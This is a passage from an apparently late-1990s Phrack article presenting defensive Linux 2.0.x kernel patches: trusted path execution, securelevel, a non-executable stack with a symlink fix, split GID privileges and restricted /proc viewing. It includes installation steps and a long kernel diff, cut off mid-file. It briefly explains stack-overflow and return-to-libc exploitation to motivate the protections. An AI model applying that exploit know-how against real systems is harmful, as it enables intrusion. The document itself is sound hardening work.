+    Whelp... 1) has happened.  You cannot prevent anyone from getting it.  It's
+out there.  You could remove permissions from the compiler on your machine or
+remove the binary entirely, but this does not stop the user from compiling 
+the exploit elsewhere, and getting the binary on your machine somehow.  You 
+cannot prevent 2) either.  However, if you only allow binaries to be executed 
+from a trusted path, you can prevent 3) from happening.  A trusted path is
+one that is inside is a root owned directory that is not group or world 
+writable.  /bin, /usr/bin, /usr/local/bin, are (under normal circumstances) 
+considered trusted.  Any non-root users home directory is not trusted, nor is
+/tmp.  Be warned:  This patch is a major annoyance to users who like to execute
+code and scripts from their home directories!  It will make you extremely 
+un-popular as far as these people are concerned.  It will also let you sleep
+easier at night knowing that no unscrupulous persons will be executing 
+malicious bits of code on your machine.
+
+    Before any call to exec is allowed to run, we open the inode of the
+directory that the executable lives in and check ownership and permissions.
+If the directory is not owned by root, or is writable to group or other, we
+consider that untrusted.
+
+
+securelevel patch
+-----------------
+Tested on:  2.0.26 +
+Author:     route
+
+    Damnit, if I set the immutable and append only bits, I did it for a reason.
+
+    This patch isn't really much of a patch.  It simply bumps the securelevel
+up, to 1 from 0.  This freezes the immutable and append-only bits on files,
+keeping anyone from changing them (from the normal chattr interface).  Before
+turning this on, you should of course make certain key files immutable, and
+logfiles append-only.  It is still possible to open the raw disk device,
+however.  Your average cut and paste hacker will probably not know how to do
+this.
+    
+
+stack execution disabling patch and symlink patch
+-------------------------------
+Tested on:  2.0.30 +
+Author:     solar designer
+
+    From the documentation accompanying SD's patch:
+
+This patch is intended to add protection against two classes of security
+holes: buffer overflows and symlinks in /tmp.
+
+Most buffer overflow exploits are based on overwriting a function's return
+address on the stack to point to some arbitrary code, which is also put
+onto the stack. If the stack area is non-executable, buffer overflow
+vulnerabilities become harder to exploit.
+
+Another way to exploit a buffer overflow is to point the return address to
+a function in libc, usually system(). This patch also changes the default
+address that shared libraries are mmap()ed at to make it always contain a
+zero byte. This makes it impossible to specify any more data (parameters
+to the function, or more copies of the return address when filling with a
+pattern) in an exploit that has to do with ASCIIZ strings (this is the
+case for most overflow vulnerabilities).
+
+However, note that this patch is by no means a complete solution, it just
+adds an extra layer of security. Some buffer overflow vulnerabilities will
+still remain exploitable a more complicated way. The reason for using such
+a patch is to protect against some of the buffer overflow vulnerabilities
+that are yet unknown.
+
+In this version of my patch I also added a symlink security fix, originally
+by Andrew Tridgell. I changed it to prevent from using hard links too, by
+simply not allowing non-root users to create hard links to files they don't
+own, in +t directories. This seems to be the desired behavior anyway, since
+otherwise users couldn't remove such links they just created. I also added
+exploit attempt logging, this code is shared with the non-executable stack
+stuff, and was the reason to make it a single patch instead of two separate
+ones. You can enable them separately anyway.
+
+
+GID split privilege patch
+-------------------------------
+Tested on:  2.0.30 +
+Author:     Original version DaveG, updated for 2.0.33 by route
+
+    From the documentation accompanying Dave's original patch:
+This is a simple kernel patch that allows you to perform certain
+privileged operations with out requiring root access.  With this patch
+three groups become privileged groups allowed to do different operations
+within the kernel.
+
+GID 16 : a program running with group 16 privileges can bind to a
+         < 1024.  This allows programs like: rlogin, rcp, rsh, and ssh
+         to run setgid 16 instead of setuid 0(root).  This also allows
+         servers that need to run as root to bind to a privileged port
+         like named, to also run setgid 16.
+
+GID 17 : any program running under GID 17 privileges will be able to
+         create a raw socket.  Programs like ping and traceroute can now
+         be made to run setgid 17 instead of setuid 0(root).
+
+GID 18 : This group is for SOCK_PACKET.  This isn't useful for most people,
+         so if you don't know what it is, don't worry about it.
+
+Limitations
+-----------
+Since this is a simple patch, it is VERY limited.  First of all, there
+is no support for supplementary groups.  This means that you can't stack
+these privileges.  If you need GID 16 and 17, there isn't much you can do
+about it.
+
+
+
+----[  Installation 
+
+
+    This patchfile has been tested and verified to work against the latest
+stable release of the linux kernel (as of this writing, 2.0.33).  It should
+work against other 2.0.x releases as well with little or no modification.  THIS
+IS NOT A GUARANTEE!  Please do not send me your failed patch logs from older
+kernels.  Take this as a perfect opportunity to upgrade your kernel to the
+latest release.  Note that several of these patches are for X86-Linux only.
+Sorry.
+
+1.  Create the symlink:
+
+        `cd /usr/src`
+        `ln -s linux-KERNEL_VERSION linux-stock`
+
+2.  Apply the kernel patch:
+
+        `patch < slinux.patch >& patch.err`
+
+2a. Examine the error file for any failed hunks.  Figure where you went wrong
+    in life:
+
+        `grep fail patch.err`
+
+3.  Configure your kernel:
+
+        `make config` OR `make menu-config` OR `make xconfig`
+
+4.  You will need to enable prompting for experimental code in your kernel and
+    turn on the patches individually.
+
+5.  To configure the split GID privilege patch, add the follow to your
+    /etc/group file:
+
+        `cat >> /etc/group`
+          priv_port::16:user1, user2, user3
+          raw_sock::17:user1, user2
+          sock_pak::18:user2, user3
+        ^D
+
+    Where `userx` are the usernames of the users you wish to give these
+    permissions to.  Next, fix the corresponding group and permissions on the 
+    binaries you wish to strip root privileges from:
+
+        `chgrp raw_sock /bin/ping`
+        `chmod 2755 /bin/ping`
+
+
+
+----[  The patchfile
+
+
+    This patchfile should be extracted with the Phrack Magazine Extraction
+Utility included in this (and every) issue.
+
+<++> slinux.patch
+diff -ru linux-stock/Documentation/Configure.help linux-patched/Documentation/Configure.help
+--- linux-stock/Documentation/Configure.help	Fri Sep  5 20:43:58 1997
++++ linux-patched/Documentation/Configure.help	Mon Nov 10 22:02:36 1997
+@@ -720,6 +720,77 @@
+   later load the module when you install the JDK or find an interesting
+   Java program that you can't live without.
+ 
++Non-executable user stack area (EXPERIMENTAL)
++CONFIG_STACKEXEC
++  Most buffer overflow exploits are based on overwriting a function's
++  return address on the stack to point to some arbitrary code, which is
++  also put onto the stack. If the stack area is non-executable, buffer
++  overflow vulnerabilities become harder to exploit. However, a few
++  programs depend on the stack being executable, and might stop working
++  unless you also enable GCC trampolines autodetection below, or enable
++  the stack area execution permission for every such program separately
++  using chstk.c. If you don't know what all this is about, or don't care
++  about security that much, say N.
++
++Autodetect GCC trampolines
++CONFIG_STACKEXEC_AUTOENABLE
++  GCC generates trampolines on the stack to correctly pass control to
++  nested functions when calling from outside. This requires the stack
++  being executable. When this option is enabled, programs containing
++  trampolines will automatically get their stack area executable when
++  a trampoline is found. However, in some cases this autodetection can
++  be fooled in a buffer overflow exploit, so it is more secure to
++  disable this option and use chstk.c to enable the stack area execution
++  permission for every such program separately. If you're too lazy,
++  answer Y.
++
++Log buffer overflow exploit attempts
++CONFIG_STACKEXEC_LOG
++  This option enables logging of buffer overflow exploit attempts. No
++  more than one attempt per minute is logged, so this is safe. Say Y.
++
++Process table viewing restriction (EXPERIMENTAL)
++CONFIG_PROC_RESTRICT
++  This option enables process table viewing restriction.  Users will only
++  be able to get status of processes they own, with the exception the 
++  root user, who can get an entire process table listing.  This patch
++  should not cause any problems with other programs but it is not fully
++  tested under every possible contingency.  You must enable the /proc 
++  filesystem for this option to be of any use.  If you run a multi-user
++  system and are reasonably concerned with privacy and/or security, say Y.
++
++Trusted path execution (EXPERIMENTAL)
++CONFIG_TPE
++  This option enables trusted path execution.  Binaries are considered
++  `trusted` if they live in a root owned directory that is not group or
++  world writable.  If an attempt is made to execute a program from a non
++  trusted directory, it will simply not be allowed to run.  This is 
++  quite useful on a multi-user system where security is an issue.  Users
++  will not be able to compile and execute arbitrary programs (read: evil)
++  from their home directories, as these directories are not trusted.  
++  This option is useless on a single user machine.
++
++Trusted path execution (EXPERIMENTAL)
++CONFIG_TPE_LOG
++  This option enables logging of execution attempts from non-trusted
++  paths.
++  
++Secure mode (EXPERIMENTAL)
++CONFIG_SECURE_ON
++  This bumps up the securelevel from 0 to 1.  When the securelevel is `on`,
++  immutable and append-only bits cannot be set or cleared.  If you are not
++  concerned with security, you can say `N`.
++
++Split Network Groups (EXPERIMENTAL)
++CONFIG_SPLIT_GID  
++  This is a simple kernel patch that allows you to perform certain
++  privileged operations with out requiring root access.  With this patch
++  three groups become privileged groups allowed to do different operations
++  within the kernel.
++  GID 16 allows programs to bind to privledged ports.
++  GID 17 allows programs to open raw sockets.
++  GID 18 allows programs to open sock packets.
++
+ Processor type
+ CONFIG_M386
+   This is the processor type of your CPU. It is used for optimizing
+@@ -2951,6 +3020,27 @@
+   netatalk, new mars-nwe and other file servers. At the time of
+   writing none of these are available. So it's safest to say N here
+   unless you really know that you need this feature.
++
++Symlink security fix (EXPERIMENTAL)
++CONFIG_SYMLINK_FIX
++  A very common class of security hole on UNIX-like systems involves
++  a malicious user creating a symbolic link in /tmp pointing at
++  another user's file. When the victim then writes to that file they
++  inadvertently write to the wrong file. Enabling this option fixes
++  this class of hole by preventing a process from following a link
++  which is in a +t directory unless they own the link. However, this
++  fix does not affect links owned by root, since these could only be
++  created by someone having root access already. To prevent someone
++  from using a hard link instead, this fix does not allow non-root
++  users to create hard links in a +t directory to files they don't
++  own. Note that this fix might break things. Only say Y if security
++  is more important.
++
++Log symlink exploit attempts
++CONFIG_SYMLINK_LOG
++  This option enables logging of symlink (and hard link) exploit
++  attempts. No more than one attempt per minute is logged, so this is
++  safe. Say Y.
+ 
+ Minix fs support
+ CONFIG_MINIX_FS
+diff -ru linux-stock/arch/i386/config.in linux-patched/arch/i386/config.in
+--- linux-stock/arch/i386/config.in	Sun May 12 21:17:23 1996
++++ linux-patched/arch/i386/config.in	Sun Nov  9 12:38:27 1997
+@@ -35,6 +35,15 @@
+ tristate 'Kernel support for ELF binaries' CONFIG_BINFMT_ELF
+ if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then
+   tristate 'Kernel support for JAVA binaries' CONFIG_BINFMT_JAVA
++  bool 'Non-executable user stack area (EXPERIMENTAL)' CONFIG_STACKEXEC
++  if [ "$CONFIG_STACKEXEC" = "y" ]; then
++    bool '   Autodetect GCC trampolines' CONFIG_STACKEXEC_AUTOENABLE
++    bool '   Log buffer overflow exploit attempts' CONFIG_STACKEXEC_LOG
++  fi
++    bool '   Restrict process table viewing (EXPERIMENTAL)' CONFIG_PROC_RESTRICT
++    bool '   Trusted path execution (EXPERIMENTAL)' CONFIG_TPE
++    bool '   Log untrusted path execution attempts (EXPERIMENTAL)' CONFIG_TPE_LOG
++    bool '   Split Network GIDs (EXPERIMENTAL)' CONFIG_SPLIT_GID
+ fi
+ bool 'Compile kernel as ELF - if your GCC is ELF-GCC' CONFIG_KERNEL_ELF
+ 
+diff -ru linux-stock/arch/i386/defconfig linux-patched/arch/i386/defconfig
+--- linux-stock/arch/i386/defconfig	Mon Sep 22 13:44:01 1997
++++ linux-patched/arch/i386/defconfig	Sun Nov  9 12:38:23 1997
+@@ -24,6 +24,10 @@
+ CONFIG_SYSVIPC=y
+ CONFIG_BINFMT_AOUT=y
+ CONFIG_BINFMT_ELF=y
++# CONFIG_STACKEXEC is not set
++CONFIG_STACKEXEC_AUTOENABLE=y
++CONFIG_STACKEXEC_LOG=y
++CONFIG_SPLIT_GID=y
+ CONFIG_KERNEL_ELF=y
+ # CONFIG_M386 is not set
+ # CONFIG_M486 is not set
+@@ -134,6 +138,8 @@
+ # Filesystems
+ #
+ # CONFIG_QUOTA is not set
++# CONFIG_SYMLINK_FIX is not set
++CONFIG_SYMLINK_LOG=y 
+ CONFIG_MINIX_FS=y
+ # CONFIG_EXT_FS is not set
+ CONFIG_EXT2_FS=y
+@@ -143,6 +149,9 @@
+ # CONFIG_VFAT_FS is not set
+ # CONFIG_UMSDOS_FS is not set
+ CONFIG_PROC_FS=y
++CONFIG_PROC_RESTRICT=y
++CONFIG_TPE=y
++CONFIG_TPE_LOG=y
+ CONFIG_NFS_FS=y
+ # CONFIG_ROOT_NFS is not set
+ # CONFIG_SMB_FS is not set
+diff -ru linux-stock/arch/i386/kernel/head.S linux-patched/arch/i386/kernel/head.S
+--- linux-stock/arch/i386/kernel/head.S	Tue Aug  5 09:19:53 1997
++++ linux-patched/arch/i386/kernel/head.S	Sun Nov  9 00:55:50 1997
+@@ -400,10 +400,17 @@
+ 	.quad 0x0000000000000000	/* not used */
+ 	.quad 0xc0c39a000000ffff	/* 0x10 kernel 1GB code at 0xC0000000 */
+ 	.quad 0xc0c392000000ffff	/* 0x18 kernel 1GB data at 0xC0000000 */
++#ifdef CONFIG_STACKEXEC
++	.quad 0x00cafa000000ffff	/* 0x23 user   2.75GB code at 0 */
++	.quad 0x00cbf2000000ffff	/* 0x2b user   3GB data at 0 */
++	.quad 0x00cbda000000ffff	/* 0x32 user   3GB code at 0, DPL=2 */
++	.quad 0x00cbd2000000ffff	/* 0x3a user   3GB stack at 0, DPL=2 */
++#else
+ 	.quad 0x00cbfa000000ffff	/* 0x23 user   3GB code at 0x00000000 */
+ 	.quad 0x00cbf2000000ffff	/* 0x2b user   3GB data at 0x00000000 */
+ 	.quad 0x0000000000000000	/* not used */
+ 	.quad 0x0000000000000000	/* not used */
++#endif
+ 	.fill 2*NR_TASKS,8,0		/* space for LDT's and TSS's etc */
+ #ifdef CONFIG_APM
+ 	.quad 0x00c09a0000000000	/* APM CS    code */
+diff -ru linux-stock/arch/i386/kernel/ptrace.c linux-patched/arch/i386/kernel/ptrace.c
+--- linux-stock/arch/i386/kernel/ptrace.c	Mon Aug  4 12:12:22 1997
++++ linux-patched/arch/i386/kernel/ptrace.c	Sun Nov  9 00:55:50 1997
+@@ -413,7 +413,7 @@
+ 			    addr == FS || addr == GS ||
+ 			    addr == CS || addr == SS) {
+ 			    	data &= 0xffff;
+-			    	if (data && (data & 3) != 3)
++			    	if (data && (data & 3) < 2)
+ 					return -EIO;
+ 			}
+ 			if (addr == EFL) {   /* flags. */
+@@ -423,6 +423,10 @@
+ 		  /* Do not allow the user to set the debug register for kernel
+ 		     address space */
+ 		  if(addr < 17){
++			if (addr == EIP && (data & 0xF0000000) == 0xB0000000)
++			if (put_stack_long(child, CS*sizeof(long)-MAGICNUMBER, USER_HUGE_CS) ||
++			    put_stack_long(child, SS*sizeof(long)-MAGICNUMBER, USER_HUGE_SS))
++				return -EIO;
+ 			  if (put_stack_long(child, sizeof(long)*addr-MAGICNUMBER, data))
+ 				return -EIO;
+ 			return 0;
+diff -ru linux-stock/arch/i386/kernel/signal.c linux-patched/arch/i386/kernel/signal.c
+--- linux-stock/arch/i386/kernel/signal.c	Mon Aug  4 12:12:51 1997
++++ linux-patched/arch/i386/kernel/signal.c	Sun Nov  9 00:55:50 1997
+@@ -83,10 +83,10 @@
+ #define COPY_SEG(x) \
+ if (   (context.x & 0xfffc)     /* not a NULL selectors */ \
+     && (context.x & 0x4) != 0x4 /* not a LDT selector */ \
+-    && (context.x & 3) != 3     /* not a RPL3 GDT selector */ \
++    && (context.x & 3) < 2      /* not a RPL3 or RPL2 GDT selector */ \
+    ) goto badframe; COPY(x);
+ #define COPY_SEG_STRICT(x) \
+-if (!(context.x & 0xfffc) || (context.x & 3) != 3) goto badframe; COPY(x);
++if (!(context.x & 0xfffc) || (context.x & 3) < 2) goto badframe; COPY(x);
+ 	struct sigcontext_struct context;
+ 	struct pt_regs * regs;
+ 
+@@ -167,16 +167,20 @@
+ 	unsigned long * frame;
+ 
+ 	frame = (unsigned long *) regs->esp;
+-	if (regs->ss != USER_DS && sa->sa_restorer)
++	if (regs->ss != USER_DS && regs->ss != USER_HUGE_SS && sa->sa_restorer)
+ 		frame = (unsigned long *) sa->sa_restorer;
+ 	frame -= 64;
+ 	if (verify_area(VERIFY_WRITE,frame,64*4))
+ 		do_exit(SIGSEGV);
+ 
+ /* set up the "normal" stack seen by the signal handler (iBCS2) */
++#ifdef CONFIG_STACKEXEC
++	put_user((unsigned long)MAGIC_SIGRETURN, frame);
++#else
+ #define __CODE ((unsigned long)(frame+24))
+ #define CODE(x) ((unsigned long *) ((x)+__CODE))
+ 	put_user(__CODE,frame);
++#endif
+ 	if (current->exec_domain && current->exec_domain->signal_invmap)
+ 		put_user(current->exec_domain->signal_invmap[signr], frame+1);
+ 	else
+@@ -204,19 +208,17 @@
+ /* non-iBCS2 extensions.. */
+ 	put_user(oldmask, frame+22);
+ 	put_user(current->tss.cr2, frame+23);
++#ifndef CONFIG_STACKEXEC
+ /* set up the return code... */
+ 	put_user(0x0000b858, CODE(0));	/* popl %eax ; movl $,%eax */
+ 	put_user(0x80cd0000, CODE(4));	/* int $0x80 */
+ 	put_user(__NR_sigreturn, CODE(2));
+ #undef __CODE
+ #undef CODE
++#endif
+ 
+ 	/* Set up registers for signal handler */
+-	regs->esp = (unsigned long) frame;
+-	regs->eip = (unsigned long) sa->sa_handler;
+-	regs->cs = USER_CS; regs->ss = USER_DS;
+-	regs->ds = USER_DS; regs->es = USER_DS;
+-	regs->gs = USER_DS; regs->fs = USER_DS;
++	start_thread(regs, (unsigned long)sa->sa_handler, (unsigned long)frame);
+ 	regs->eflags &= ~TF_MASK;
+ }
+ 
+diff -ru linux-stock/arch/i386/kernel/traps.c linux-patched/arch/i386/kernel/traps.c
+--- linux-stock/arch/i386/kernel/traps.c	Mon Aug 11 13:37:24 1997
++++ linux-patched/arch/i386/kernel/traps.c	Sun Nov  9 00:55:50 1997
+@@ -117,7 +117,7 @@
+ 
+ 	esp = (unsigned long) &regs->esp;
+ 	ss = KERNEL_DS;
+-	if ((regs->eflags & VM_MASK) || (3 & regs->cs) == 3)
++	if ((regs->eflags & VM_MASK) || (3 & regs->cs) >= 2)
+ 		return;
+ 	if (regs->cs & 3) {
+ 		esp = regs->esp;
+@@ -193,11 +193,82 @@
+ 
+ asmlinkage void do_general_protection(struct pt_regs * regs, long error_code)
+ {
++#ifdef CONFIG_STACKEXEC
++	unsigned long retaddr;
++#endif
++
+ 	if (regs->eflags & VM_MASK) {
+ 		handle_vm86_fault((struct vm86_regs *) regs, error_code);
+ 		return;
+ 	}
++
++#ifdef CONFIG_STACKEXEC
++/* Check if it was return from a signal handler */
++	if (regs->cs == USER_CS || regs->cs == USER_HUGE_CS)
++	if (get_seg_byte(USER_DS, (char *)regs->eip) == 0xC3)
++	if (!verify_area(VERIFY_READ, (void *)regs->esp, 4))
++	if ((retaddr = get_seg_long(USER_DS, (char *)regs->esp)) ==
++	    MAGIC_SIGRETURN) {
++/*
++ * Call sys_sigreturn() to restore the context. It would definitely be better
++ * to convert sys_sigreturn() into an inline function accepting a pointer to
++ * pt_regs, making this faster...
++ */
++		regs->esp += 8;
++		__asm__("movl %3,%%esi;"
++			"subl %1,%%esp;"
++			"movl %2,%%ecx;"
++			"movl %%esp,%%edi;"
++			"cld; rep; movsl;"
++			"call sys_sigreturn;"
++			"leal %3,%%edi;"
++			"addl %1,%%edi;"
++			"movl %%esp,%%esi;"
++			"movl (%%edi),%%edi;"
++			"movl %2,%%ecx;"
++			"cld; rep; movsl;"
++			"movl %%esi,%%esp"
++		:
++/* %eax is returned separately */
++		"=a" (regs->eax)
++		:
++		"i" (sizeof(*regs)),
++		"i" (sizeof(*regs) >> 2),
++		"m" (regs)
++		:
++		"cx", "dx", "si", "di", "cc", "memory");
++		return;
++	}
++
++#ifdef CONFIG_STACKEXEC_LOG
++/*
++ * Check if we're returning to the stack area, which is only likely to happen
++ * when attempting to exploit a buffer overflow.
++ */
++	else if (regs->cs == USER_CS &&
++	    (retaddr & 0xF0000000) == 0xB0000000)
++		security_alert("buffer overflow");
++#endif
++#endif
++
+ 	die_if_kernel("general protection",regs,error_code);
++
++#if defined(CONFIG_STACKEXEC) && defined(CONFIG_STACKEXEC_AUTOENABLE)
++/*
++ * Switch to the original huge code segment (and allow code execution on the
++ * stack for this entire process), if the faulty instruction is a call %reg,
++ * except for call %esp.
++ */
++	if (regs->cs == USER_CS)
++	if (get_seg_byte(USER_DS, (char *)regs->eip) == 0xFF &&
++	    (get_seg_byte(USER_DS, (char *)(regs->eip + 1)) & 0xD8) == 0xD0 &&
++	    get_seg_byte(USER_DS, (char *)(regs->eip + 1)) != 0xD4) {
++		current->flags |= PF_STACKEXEC;
++		regs->cs = USER_HUGE_CS; regs->ss = USER_HUGE_SS;
++		return;
++	}
++#endif
++
+ 	current->tss.error_code = error_code;
+ 	current->tss.trap_no = 13;
+ 	force_sig(SIGSEGV, current);	
+diff -ru linux-stock/arch/i386/mm/fault.c linux-patched/arch/i386/mm/fault.c
+--- linux-stock/arch/i386/mm/fault.c	Sat Aug 16 22:21:20 1997
++++ linux-patched/arch/i386/mm/fault.c	Sun Nov  9 00:55:50 1997
+@@ -44,6 +44,7 @@
+ 	unsigned long page;
+ 	int write;
+ 
++	if ((regs->cs & 3) >= 2) error_code |= 4;
+ 	/* get the address */
+ 	__asm__("movl %%cr2,%0":"=r" (address));
+ 	down(&mm->mmap_sem);
+diff -ru linux-stock/fs/binfmt_aout.c linux-patched/fs/binfmt_aout.c
+--- linux-stock/fs/binfmt_aout.c	Wed Oct 15 14:56:43 1997
++++ linux-patched/fs/binfmt_aout.c	Tue Nov 11 00:38:48 1997
+@@ -315,6 +315,7 @@
+ 	current->suid = current->euid = current->fsuid = bprm->e_uid;
+ 	current->sgid = current->egid = current->fsgid = bprm->e_gid;
+  	current->flags &= ~PF_FORKNOEXEC;
++        if (N_FLAGS(ex) & F_STACKEXEC) current->flags |= PF_STACKEXEC;
+ 	if (N_MAGIC(ex) == OMAGIC) {
+ #ifdef __alpha__
+ 		do_mmap(NULL, N_TXTADDR(ex) & PAGE_MASK,
+diff -ru linux-stock/fs/binfmt_elf.c linux-patched/fs/binfmt_elf.c
+--- linux-stock/fs/binfmt_elf.c	Wed Oct 15 14:56:43 1997
++++ linux-patched/fs/binfmt_elf.c	Tue Nov 11 01:02:05 1997
+@@ -55,7 +55,10 @@
+ #define ELF_PAGESTART(_v) ((_v) & ~(unsigned long)(ELF_EXEC_PAGESIZE-1))
+ #define ELF_PAGEOFFSET(_v) ((_v) & (ELF_EXEC_PAGESIZE-1))
+ 
+-static struct linux_binfmt elf_format = {
++#ifndef CONFIG_STACKEXEC
++static
++#endif
++struct linux_binfmt elf_format = {  
+ #ifndef MODULE
+ 	NULL, NULL, load_elf_binary, load_elf_library, elf_core_dump
+ #else
+@@ -662,6 +665,7 @@
+ 	current->suid = current->euid = current->fsuid = bprm->e_uid;
+ 	current->sgid = current->egid = current->fsgid = bprm->e_gid;
+ 	current->flags &= ~PF_FORKNOEXEC;
++        if (elf_ex.e_flags & EF_STACKEXEC) current->flags |= PF_STACKEXEC;
+ 	bprm->p = (unsigned long) 
+ 	  create_elf_tables((char *)bprm->p,
+ 			bprm->argc,
+diff -ru linux-stock/fs/exec.c linux-patched/fs/exec.c
+--- linux-stock/fs/exec.c	Wed Oct 15 14:56:43 1997
++++ linux-patched/fs/exec.c	Tue Nov 11 12:59:51 1997
+@@ -475,6 +475,8 @@
+ 	}
+ 	current->comm[i] = '\0';
+ 
++        current->flags &= ~PF_STACKEXEC;
++
+ 	/* Release all of the old mmap stuff. */
+ 	if (exec_mmap())
+ 		return -ENOMEM;
+@@ -650,12 +652,30 @@
+ int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)
+ {
+ 	struct linux_binprm bprm;
++        struct inode *dir;
++        const char *basename;
++        int namelen;
+ 	int retval;
+ 	int i;
+ 
+ 	bprm.p = PAGE_SIZE*MAX_ARG_PAGES-sizeof(void *);
+ 	for (i=0 ; i<MAX_ARG_PAGES ; i++)	/* clear page-table */
+ 		bprm.page[i] = 0;
++    
++#ifdef  CONFIG_TPE
++        /* Check to make sure the path is trusted.  If the directory is root
++         * owned and not group/world writable, it's trusted.  Otherwise, 
++         * return -EACCES and optionally log it
++         */
++        dir_namei(filename, &namelen, &basename, NULL, &dir);
++        if (dir->i_mode & (S_IWGRP | S_IWOTH) || dir->i_uid)
++        {
++#ifdef  CONFIG_TPE_LOG
++            security_alert("Trusted path execution violation");
++#endif  /* CONFIG_TPE_LOG */
++            return -EACCES;
++        }
++#endif  /* CONFIG_TPE */
+ 	retval = open_namei(filename, 0, 0, &bprm.inode, NULL);
+ 	if (retval)
+ 		return retval;
+diff -ru linux-stock/fs/namei.c linux-patched/fs/namei.c
+--- linux-stock/fs/namei.c	Sat Aug 16 16:23:19 1997
++++ linux-patched/fs/namei.c	Tue Nov 11 00:44:51 1997
+@@ -19,6 +19,7 @@
+ #include <linux/fcntl.h>
+ #include <linux/stat.h>
+ #include <linux/mm.h>
++#include <linux/config.h>
+ 
+ #define ACC_MODE(x) ("\000\004\002\006"[(x)&O_ACCMODE])
+ 
+@@ -207,6 +208,23 @@
+ 		*res_inode = inode;
+ 		return 0;
+ 	}
++#ifdef CONFIG_SYMLINK_FIX
++/*
++ * Don't follow links that we don't own in +t directories, unless the link
++ * is owned by root.
++ */
++        if (S_ISLNK(inode->i_mode) && (dir->i_mode & S_ISVTX) &&
++            inode->i_uid &&
++            current->fsuid != inode->i_uid) {
++#ifdef CONFIG_SYMLINK_LOG
++                security_alert("symlink");
++#endif
++                iput(dir);
++                iput(inode);
++                *res_inode = NULL;
++                return -EPERM;
++        }
++#endif
+ 	return inode->i_op->follow_link(dir,inode,flag,mode,res_inode);
+ }
+ 
+@@ -216,8 +234,13 @@
+  * dir_namei() returns the inode of the directory of the
+  * specified name, and the name within that directory.
+  */
++#ifdef  CONFIG_TPE
++int dir_namei(const char *pathname, int *namelen, const char **name,
++                     struct inode * base, struct inode **res_inode)
++#else
+ static int dir_namei(const char *pathname, int *namelen, const char **name,
+                      struct inode * base, struct inode **res_inode)
++#endif  /* CONFIG_TPE */
+ {
+ 	char c;
+ 	const char * thisname;
+@@ -787,6 +810,22 @@
+ 		iput(dir);
+ 		return -EPERM;
+ 	}
++#ifdef CONFIG_SYMLINK_FIX
++/*
++ * Don't allow non-root users to create hard links to files they don't own
++ * in a +t directory.
++ */
++        if ((dir->i_mode & S_ISVTX) &&
++            current->fsuid != oldinode->i_uid &&
++            !fsuser()) {
++#ifdef CONFIG_SYMLINK_LOG
++                security_alert("hard link");
++#endif
++                iput(oldinode);
++                iput(dir);
++                return -EPERM;
++        }
++#endif
+ 	if (IS_RDONLY(dir)) {
+ 		iput(oldinode);
+ 		iput(dir);
+diff -ru linux-stock/fs/proc/base.c linux-patched/fs/proc/base.c
+--- linux-stock/fs/proc/base.c	Wed Feb 21 01:26:09 1996
++++ linux-patched/fs/proc/base.c	Sun Nov  9 10:53:19 1997
+@@ -74,7 +74,11 @@
+  */
+ struct proc_dir_entry proc_pid = {
+ 	PROC_PID_INO, 5, "<pid>",
+-	S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, 0,
++#ifdef  CONFIG_PROC_RESTRICT
++        S_IFDIR | S_IRUSR | S_IXUSR, 2, 0, 0,
++#else
++        S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, 0,
++#endif  /* CONFIG_PROC_RESTRICT */
+ 	0, &proc_base_inode_operations,
+ 	NULL, proc_pid_fill_inode,
+ 	NULL, &proc_root, NULL
+diff -ru linux-stock/fs/proc/inode.c linux-patched/fs/proc/inode.c
+--- linux-stock/fs/proc/inode.c	Sat Nov 30 02:21:21 1996
++++ linux-patched/fs/proc/inode.c	Sun Nov  9 10:58:06 1997
+@@ -153,7 +153,11 @@
+ 	if (!p || i >= NR_TASKS)
+ 		return;
+ 	if (ino == PROC_ROOT_INO) {
+-		inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO;
++#ifdef  CONFIG_PROC_RESTRICT
++                inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR;
++#else
++                inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO;
++#endif  /* CONFIG_PROC_RESTRICT */
+ 		inode->i_nlink = 2;
+ 		for (i = 1 ; i < NR_TASKS ; i++)
+ 			if (task[i])
+@@ -171,7 +175,11 @@
+ 				inode->i_nlink = 2;
+ 				break;
+ 			case PROC_SCSI:
++#ifdef  CONFIG_PROC_RESTRICT
++                                inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR;
++#else
+                                 inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO;
++#endif  /* CONFIG_PROC_RESTRICT */
+                                 inode->i_nlink = 2;
+                                 inode->i_op = &proc_scsi_inode_operations;
+                                 break;
+@@ -181,7 +189,11 @@
+ 				inode->i_size = (MAP_NR(high_memory) << PAGE_SHIFT) + PAGE_SIZE;
+ 				break;
+ 			case PROC_PROFILE:
+-				inode->i_mode = S_IFREG | S_IRUGO | S_IWUSR;
++#ifdef  CONFIG_PROC_RESTRICT
++                                inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR;
++#else
++                                inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO;
++#endif  /* CONFIG_PROC_RESTRICT */
+ 				inode->i_op = &proc_profile_inode_operations;
+ 				inode->i_size = (1+prof_len) * sizeof(unsigned long);
+ 				break;
+@@ -203,7 +215,11 @@
+ 			return;
+ 		case PROC_PID_MEM:
+ 			inode->i_op = &proc_mem_inode_operations;
+-			inode->i_mode = S_IFREG | S_IRUSR | S_IWUSR;
++#ifdef  CONFIG_PROC_RESTRICT
++                        inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR;
++#else
++                        inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO;
++#endif  /* CONFIG_PROC_RESTRICT */
+ 			return;
+ 		case PROC_PID_CWD:
+ 		case PROC_PID_ROOT:
+diff -ru linux-stock/include/asm-i386/processor.h linux-patched/include/asm-i386/processor.h
+--- linux-stock/include/asm-i386/processor.h	Tue Mar 11 13:52:29 1997
++++ linux-patched/include/asm-i386/processor.h	Tue Nov 11 00:47:04 1997
+@@ -9,6 +9,8 @@
+ 
+ #include <asm/vm86.h>
+ #include <asm/math_emu.h>
++#include <linux/binfmts.h>
++#include <linux/config.h>
+ 
+ /*
+  * System setup and hardware bug flags..
+@@ -41,6 +43,15 @@
+  */
+ #define TASK_SIZE	(0xC0000000UL)
+ 
++#if defined(CONFIG_STACKEXEC) && defined(CONFIG_BINFMT_ELF)
++extern struct linux_binfmt elf_format;
++#define MMAP_ADDR ( \
++	current->binfmt == &elf_format && \
